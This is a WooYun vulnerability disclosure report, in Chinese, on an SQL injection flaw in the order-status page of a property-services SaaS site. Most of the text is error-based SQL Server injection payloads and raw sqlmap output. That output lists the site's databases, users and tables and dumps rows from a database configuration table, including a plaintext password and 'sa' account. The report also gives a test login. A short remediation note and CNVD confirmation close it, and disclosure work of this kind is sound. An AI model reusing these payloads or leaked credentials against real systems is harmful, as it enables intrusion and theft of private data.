乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-26: 细节已通知厂商并且等待厂商处理中 2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-10: 细节向核心白帽子及相关领域专家公开 2015-10-20: 细节向普通白帽子公开 2015-10-30: 细节向实习白帽子公开 2015-11-14: 细节向公众公开
注入点:http://**.**.**.**/order/orderstatus?ordernum=PO201509221357345734066
Payload: ordernum=PO201509221357345734066' AND 7406=7406 AND 'vblP'='vblP Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))) AND 'hthp'='hthp---[21:34:32] [INFO] testing Microsoft SQL Server[21:34:33] [INFO] confirming Microsoft SQL Server[21:34:36] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2012[21:34:36] [INFO] fetching database names[21:34:37] [INFO] the SQL query used returns 14 entries[21:34:38] [INFO] retrieved: CCPG_District[21:34:38] [INFO] retrieved: CCPG_PM[21:34:38] [INFO] retrieved: CCPG_SAAS[21:34:39] [INFO] retrieved: CCPG_SheShangYun[21:34:40] [INFO] retrieved: CCPGSitecore_core[21:34:40] [INFO] retrieved: CCPGSitecore_master[21:34:42] [INFO] retrieved: CCPGSitecore_web[21:34:42] [INFO] retrieved: HondaSitecore_analytics[21:34:43] [INFO] retrieved: master[21:34:44] [INFO] retrieved: model[21:34:44] [INFO] retrieved: msdb[21:34:45] [INFO] retrieved: ReportServer[21:34:46] [INFO] retrieved: ReportServerTempDB[21:34:46] [INFO] retrieved: tempdbavailable databases [14]:[*] CCPG_District[*] CCPG_PM[*] CCPG_SAAS[*] CCPG_SheShangYun[*] CCPGSitecore_core[*] CCPGSitecore_master[*] CCPGSitecore_web[*] HondaSitecore_analytics[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))) AND 'hthp'='hthp---[21:42:05] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2012[21:42:05] [INFO] fetching database users[21:42:05] [INFO] the SQL query used returns 19 entries[21:42:06] [INFO] retrieved: ##MS_AgentSigningCertificate##[21:42:06] [INFO] retrieved: ##MS_PolicyEventProcessingLogin##[21:42:07] [INFO] retrieved: ##MS_PolicySigningCertificate##[21:42:08] [INFO] retrieved: ##MS_PolicyTsqlExecutionLogin##[21:42:09] [INFO] retrieved: ##MS_SmoExtendedSigningCertificate##[21:42:10] [INFO] retrieved: ##MS_SQLAuthenticatorCertificate##[21:42:11] [INFO] retrieved: ##MS_SQLReplicationSigningCertificate##[21:42:12] [INFO] retrieved: ##MS_SQLResourceSigningCertificate##[21:42:13] [INFO] retrieved: CCPG\\\\administrator[21:42:14] [INFO] retrieved: CCPG\\\\appuser00[21:42:14] [INFO] retrieved: CCPG\\\\sqladmin[21:42:15] [INFO] retrieved: CCPVUMADBS00\\\\IUSR_Umall[21:42:15] [INFO] retrieved: NT AUTHORITY\\\\SYSTEM[21:42:16] [INFO] retrieved: NT Service\\\\MSSQLSERVER[21:42:17] [INFO] retrieved: NT SERVICE\\\\ReportServer[21:42:17] [INFO] retrieved: NT SERVICE\\\\SQLSERVERAGENT[21:42:18] [INFO] retrieved: NT SERVICE\\\\SQLWriter[21:42:18] [INFO] retrieved: NT SERVICE\\\\Winmgmt[21:42:19] [INFO] retrieved: sadatabase management system users [19]:[*] ##MS_AgentSigningCertificate##[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicySigningCertificate##[*] ##MS_PolicyTsqlExecutionLogin##[*] ##MS_SmoExtendedSigningCertificate##[*] ##MS_SQLAuthenticatorCertificate##[*] ##MS_SQLReplicationSigningCertificate##[*] ##MS_SQLResourceSigningCertificate##[*] CCPG\\administrator[*] CCPG\\appuser00[*] CCPG\\sqladmin[*] CCPVUMADBS00\\IUSR_Umall[*] NT AUTHORITY\\SYSTEM[*] NT Service\\MSSQLSERVER[*] NT SERVICE\\ReportServer[*] NT SERVICE\\SQLSERVERAGENT[*] NT SERVICE\\SQLWriter[*] NT SERVICE\\Winmgmt[*] sa
Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT C(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) T CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(11) AND 'hthp'='hthp---[21:50:58] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2012[21:50:58] [INFO] fetching tables for database: CCPG_SAAS[21:50:59] [INFO] the SQL query used returns 65 entries[21:50:59] [INFO] retrieved: dbo.CC_Activity[21:51:00] [INFO] retrieved: dbo.CC_CallBack[21:51:00] [INFO] retrieved: dbo.CC_CCNotice[21:51:01] [INFO] retrieved: dbo.CC_Charging[21:51:02] [INFO] retrieved: dbo.CC_CsrAuthority[21:51:03] [INFO] retrieved: dbo.CC_CsrGroup[21:51:04] [INFO] retrieved: dbo.CC_CsrInfo[21:51:05] [INFO] retrieved: dbo.CC_CsrStateRecord[21:51:06] [INFO] retrieved: dbo.CC_CsrTasks[21:51:06] [INFO] retrieved: dbo.CC_FeeRate[21:51:07] [INFO] retrieved: dbo.CC_OutboundTask[21:51:07] [INFO] retrieved: dbo.CC_OutboundTask_Detail[21:51:08] [INFO] retrieved: dbo.CC_OutboundTaskAssign[21:51:09] [INFO] retrieved: dbo.CC_ReturnedTask[21:51:10] [INFO] retrieved: dbo.CC_SMSInfo[21:51:10] [INFO] retrieved: dbo.CC_SMSReceiverInfo[21:51:11] [INFO] retrieved: dbo.COM_AttachmentInfo[21:51:20] [INFO] retrieved: dbo.COM_ButtonCustomizationInfo[21:51:26] [INFO] retrieved: dbo.COM_DataDictionaryInfo[21:51:27] [INFO] retrieved: dbo.COM_District[21:51:28] [INFO] retrieved: dbo.COM_MenuCustomizationInfo[21:51:28] [INFO] retrieved: dbo.COM_ModuleActionInfo[21:51:29] [INFO] retrieved: dbo.COM_ModuleGroupInfo[21:51:30] [INFO] retrieved: dbo.COM_ModuleInfo[21:51:31] [INFO] retrieved: dbo.COM_OperLogInfo[21:51:32] [INFO] retrieved: dbo.COM_OrganizationInfo[21:51:33] [INFO] retrieved: dbo.COM_RoleDataAuthInfo[21:51:41] [INFO] retrieved: dbo.COM_RoleInfo[21:51:42] [INFO] retrieved: dbo.COM_RoleModuleAuthInfo[21:51:43] [INFO] retrieved: dbo.COM_UserGroupInfo[21:51:43] [INFO] retrieved: dbo.COM_UserGroupRoleInfo[21:51:44] [INFO] retrieved: dbo.COM_UserGroupUserInfo[21:51:44] [INFO] retrieved: dbo.COM_UserInfo[21:51:45] [INFO] retrieved: dbo.COM_UserOrganizationInfo[21:51:45] [INFO] retrieved: dbo.COM_UserRoleInfo[21:51:47] [INFO] retrieved: dbo.CP_BlackList[21:51:48] [INFO] retrieved: dbo.CP_Block[21:51:49] [INFO] retrieved: dbo.CP_Block_DELETE[21:51:50] [INFO] retrieved: dbo.CP_Block_old[21:51:51] [INFO] retrieved: dbo.CP_CallDetailInfo[21:51:52] [INFO] retrieved: dbo.CP_ContractEEServiceInfo[21:51:53] [INFO] retrieved: dbo.CP_ContractInfo[21:51:53] [INFO] retrieved: dbo.CP_ContractOCRMServiceInfo[21:51:54] [INFO] retrieved: dbo.CP_ContractPMSServiceInfo[21:51:55] [INFO] retrieved: dbo.CP_ContractServiceInfo[21:51:56] [INFO] retrieved: dbo.CP_DBConfigInfo[21:51:58] [INFO] retrieved: dbo.CP_MemberBlock[21:51:58] [INFO] retrieved: dbo.CP_MemberBlock_old[21:51:59] [INFO] retrieved: dbo.CP_MemberEEServiceInfo[21:52:00] [INFO] retrieved: dbo.CP_MemberInfo[21:52:01] [INFO] retrieved: dbo.CP_MemberLineNumber[21:52:02] [INFO] retrieved: dbo.CP_MemberOCRMServiceInfo[21:52:02] [INFO] retrieved: dbo.CP_MemberPMSServiceInfo[21:52:03] [INFO] retrieved: dbo.CP_MemberResource[21:52:04] [INFO] retrieved: dbo.CP_MemberWorkorderUpgradeSetting[21:52:05] [INFO] retrieved: dbo.CP_MessageAccountInfo[21:52:06] [INFO] retrieved: dbo.CP_MessageAccountPaymentRecordInfo[21:52:06] [INFO] retrieved: dbo.CP_NoticeMessageInfo[21:52:07] [INFO] retrieved: dbo.CP_QuestionCommentInfo[21:52:12] [INFO] retrieved: dbo.CP_QuestionCommentInfo_Bak[21:52:12] [INFO] retrieved: dbo.CP_QuestionInfo[21:52:13] [INFO] retrieved: dbo.CP_QuestionInfo_Bak[21:52:17] [INFO] retrieved: dbo.CP_SendMessageInfo[21:52:17] [INFO] retrieved: dbo.CP_ServiceInfo[21:52:18] [INFO] retrieved: dbo.CP_ServiceTrialApplicationInfoDatabase: CCPG_SAAS[65 tables]+------------------------------------+| CC_Activity || CC_CCNotice || CC_CallBack || CC_Charging || CC_CsrAuthority || CC_CsrGroup || CC_CsrInfo || CC_CsrStateRecord || CC_CsrTasks || CC_FeeRate || CC_OutboundTask || CC_OutboundTaskAssign || CC_OutboundTask_Detail || CC_ReturnedTask || CC_SMSInfo || CC_SMSReceiverInfo || COM_AttachmentInfo || COM_ButtonCustomizationInfo || COM_DataDictionaryInfo || COM_District || COM_MenuCustomizationInfo || COM_ModuleActionInfo || COM_ModuleGroupInfo || COM_ModuleInfo || COM_OperLogInfo || COM_OrganizationInfo || COM_RoleDataAuthInfo || COM_RoleInfo || COM_RoleModuleAuthInfo || COM_UserGroupInfo || COM_UserGroupRoleInfo || COM_UserGroupUserInfo || COM_UserInfo || COM_UserOrganizationInfo || COM_UserRoleInfo || CP_BlackList || CP_Block || CP_Block_DELETE || CP_Block_old || CP_CallDetailInfo || CP_ContractEEServiceInfo || CP_ContractInfo || CP_ContractOCRMServiceInfo || CP_ContractPMSServiceInfo || CP_ContractServiceInfo || CP_DBConfigInfo || CP_MemberBlock || CP_MemberBlock_old || CP_MemberEEServiceInfo || CP_MemberInfo || CP_MemberLineNumber || CP_MemberOCRMServiceInfo || CP_MemberPMSServiceInfo || CP_MemberResource || CP_MemberWorkorderUpgradeSetting || CP_MessageAccountInfo || CP_MessageAccountPaymentRecordInfo || CP_NoticeMessageInfo || CP_QuestionCommentInfo || CP_QuestionCommentInfo_Bak || CP_QuestionInfo || CP_QuestionInfo_Bak || CP_SendMessageInfo || CP_ServiceInfo || CP_ServiceTrialApplicationInfo |+------------------------------------+
内网数据库配置表
Payload: ordernum=PO201509221357345734066' AND 7406=7406 AND 'vblP'='vblP Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING claus Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CH(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) TH CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113) AND 'hthp'='hthp---[22:00:09] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2012[22:00:09] [INFO] fetching columns for table 'CP_DBConfigInfo' in database 'CC_SAAS'[22:00:11] [INFO] the SQL query used returns 13 entries[22:00:11] [INFO] retrieved: Created_Time[22:00:16] [INFO] retrieved: datetime[22:00:17] [INFO] retrieved: Created_User[22:00:18] [INFO] retrieved: nvarchar[22:00:19] [INFO] retrieved: DB_Address[22:00:20] [INFO] retrieved: nvarchar[22:00:20] [INFO] retrieved: DB_Name[22:00:21] [INFO] retrieved: nvarchar[22:00:22] [INFO] retrieved: DB_Password[22:00:23] [INFO] retrieved: nvarchar[22:00:34] [INFO] retrieved: DB_Username[22:00:35] [INFO] retrieved: nvarchar[22:00:36] [INFO] retrieved: GC_Flag[22:00:37] [INFO] retrieved: bit[22:00:38] [INFO] retrieved: ID[22:00:39] [INFO] retrieved: uniqueidentifier[22:00:39] [INFO] retrieved: ID_DB_Type[22:00:41] [INFO] retrieved: uniqueidentifier[22:00:42] [INFO] retrieved: ID_Member[22:00:43] [INFO] retrieved: uniqueidentifier[22:00:43] [INFO] retrieved: Updated_Time[22:00:45] [INFO] retrieved: datetime[22:00:51] [INFO] retrieved: Updated_User[22:00:52] [INFO] retrieved: nvarchar[22:00:53] [INFO] retrieved: Url_Code[22:00:54] [INFO] retrieved: nvarchar[22:00:54] [INFO] fetching entries for table 'CP_DBConfigInfo' in database 'CC_SAAS'[22:00:55] [INFO] retrieved: 61[22:00:55] [INFO] fetching number of distinct values for column 'ID'[22:00:55] [INFO] retrieved: 61[22:00:55] [INFO] using column 'ID' as a pivot for retrieving row data[22:00:55] [INFO] retrieved: 0418FE28-D9C1-44E5-94E7-FD5AB7588BEF[22:00:56] [INFO] retrieved: KAISA_DATA_1226[22:01:00] [INFO] retrieved: 0[22:01:00] [INFO] retrieved:[22:01:01] [INFO] retrieved: 311AB7DA-ABA1-4BA1-B077-754F06E32DB3[22:01:01] [INFO] retrieved: **.**.**.**[22:01:02] [INFO] retrieved: CAD7A635-7152-44F6-80A6-9526CFE49B0A[22:01:03] [INFO] retrieved: 1qaz!QAZ[22:01:03] [INFO] retrieved: sa[22:01:04] [INFO] retrieved: 04 13 2015 \\\\?a02:46PM[22:01:27] [INFO] retrieved: admin[22:01:28] [INFO] retrieved: 04 13 2015 \\\\?a02:50PM[22:01:29] [INFO] retrieved: admin[22:01:32] [INFO] retrieved: 096797D6-162A-4C51-95E9-93225FB04DA8[22:01:33] [INFO] retrieved: XYCCWY_DATA
CCPG_SheShangYun库表太多,未全部贴出
Payload: ordernum=PO201509221357345734066' AND 7406=7406 AND 'vblP'='vblP Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ordernum=PO201509221357345734066' AND 5086=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (5086=5086) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(112)+CHAR(113))) AND 'hthp'='hthp---[22:06:44] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 8 or 2012web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.0back-end DBMS: Microsoft SQL Server 2012[22:06:44] [INFO] fetching tables for database: CCPG_SheShangYun[22:06:46] [INFO] the SQL query used returns 2118 entries[22:06:47] [INFO] retrieved: dbo.AccountPay[22:06:47] [INFO] retrieved: dbo.AccountReceive[22:06:48] [INFO] retrieved: dbo.Activity[22:06:49] [INFO] retrieved: dbo.ActivityArea[22:06:50] [INFO] retrieved: dbo.ActivityCagegory[22:06:51] [INFO] retrieved: dbo.ActivityComment[22:06:51] [INFO] retrieved: dbo.ActivityParticipants[22:06:52] [INFO] retrieved: dbo.ActivityPhoto[22:06:52] [INFO] retrieved: dbo.ActivityPrize[22:06:53] [INFO] retrieved: dbo.ActivityRegistration[22:06:54] [INFO] retrieved: dbo.ActivityResults[22:06:55] [INFO] retrieved: dbo.ActivitySaved[22:06:56] [INFO] retrieved: dbo.ActivitySupport[22:06:57] [INFO] retrieved: dbo.AdCustomPage[22:06:58] [INFO] retrieved: dbo.Address[22:06:59] [INFO] retrieved: dbo.Advert[22:07:00] [INFO] retrieved: dbo.AdvertCategory[22:07:01] [INFO] retrieved: dbo.AdvertImages[22:07:05] [INFO] retrieved: dbo.AdvertImagesRelation[22:07:07] [INFO] retrieved: dbo.AdvertMerchantRelation[22:07:08] [INFO] retrieved: dbo.AppPageModule[22:07:09] [INFO] retrieved: dbo.AppSession[22:07:10] [INFO] retrieved: dbo.AppUserModule[22:07:11] [INFO] retrieved: dbo.AppVersion[22:07:12] [INFO] retrieved: dbo.AspNetRoles[22:07:13] [INFO] retrieved: dbo.AspNetUserClaims[22:07:13] [INFO] retrieved: dbo.AspNetUserLogins[22:07:15] [INFO] retrieved: dbo.AspNetUserRoles[22:07:16] [INFO] retrieved: dbo.AspNetUsers[22:07:17] [INFO] retrieved: dbo.AspNetUsers_0805[22:07:18] [INFO] retrieved: dbo.AspNetUsersLoginInfo[22:07:20] [INFO] retrieved: dbo.AttributeName[22:07:20] [INFO] retrieved: dbo.AttributeOption[22:07:22] [INFO] retrieved: dbo.BottomNavigation[22:07:23] [INFO] retrieved: dbo.Brand[22:07:24] [INFO] retrieved: dbo.BrandCategoryRelation[22:07:26] [INFO] retrieved: dbo.BusinessInfo[22:07:27] [INFO] retrieved: dbo.CallSource[22:07:28] [INFO] retrieved: dbo.CarInfo[22:07:30] [INFO] retrieved: dbo.CategoryPhoto[22:07:36] [INFO] retrieved: dbo.CommentAndSalesCount[22:08:50] [INFO] retrieved: dbo.Commission[22:08:50] [INFO] retrieved: dbo.Community[22:08:51] [INFO] retrieved: dbo.Community_Bak[22:08:52] [INFO] retrieved: dbo.Complaint[22:08:52] [INFO] retrieved: dbo.ComplaintRelatedPhoto[22:08:53] [INFO] retrieved: dbo.ContactUs[22:08:53] [INFO] retrieved: dbo.CrowdsourceEquipment[22:08:54] [INFO] retrieved: dbo.CrowdsourceMerchant[22:08:55] [INFO] retrieved: dbo.CrowdsourceMerchantArea[22:09:00] [INFO] retrieved: dbo.CrowdsourceMerchantService[22:09:23] [INFO] retrieved: dbo.CrowdsourceNotice[22:09:23] [INFO] retrieved: dbo.CrowdsourceService[22:09:33] [INFO] retrieved: dbo.CrowdsourceServiceOrder[22:09:38] [INFO] retrieved: dbo.CrowdsourceServiceOrderComment[22:09:38] [INFO] retrieved: dbo.CrowdsourceUser[22:09:42] [INFO] retrieved: dbo.CrowdsourceUserPhotos[22:09:44] [INFO] retrieved: dbo.CustomerReview[22:09:45] [INFO] retrieved: dbo.CustomerReview_2014[22:09:46] [INFO] retrieved: dbo.CustomerReview_2015[22:09:47] [INFO] retrieved: dbo.CustomerReview_2016[22:09:47] [INFO] retrieved: dbo.CustomerReview_2017[22:09:48] [INFO] retrieved: dbo.CustomerReview_2018[22:09:49] [INFO] retrieved: dbo.CustomerReview_2019[22:09:49] [INFO] retrieved: dbo.CustomerReview_2020[22:09:50] [INFO] retrieved: dbo.DataDictionaryInfo[22:09:51] [INFO] retrieved: dbo.DeliveryAddress[22:09:52] [INFO] retrieved: dbo.Department[22:09:53] [INFO] retrieved: dbo.DistributionRange[22:09:56] [INFO] retrieved: dbo.District[22:09:57] [INFO] retrieved: dbo.DrainageBrowseRecord[22:09:58] [INFO] retrieved: dbo.EmailAddress[22:09:58] [INFO] retrieved: dbo.EmailTask[22:09:59] [INFO] retrieved: dbo.EmailTemp[22:10:01] [INFO] retrieved: dbo.Eventbrowse[22:10:01] [INFO] retrieved: dbo.EventSaved[22:10:02] [INFO] retrieved: dbo.ExceptionLog[22:10:02] [INFO] retrieved: dbo.FamilyMember[22:10:04] [INFO] retrieved: dbo.GenericCategory[22:10:06] [INFO] retrieved: dbo.Groupon
http://**.**.**.**/Login/Login.aspx账号:test密码:123456
过滤sql注入特殊字符
危害等级:中
漏洞Rank:10
确认时间:2015-09-30 09:38
CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无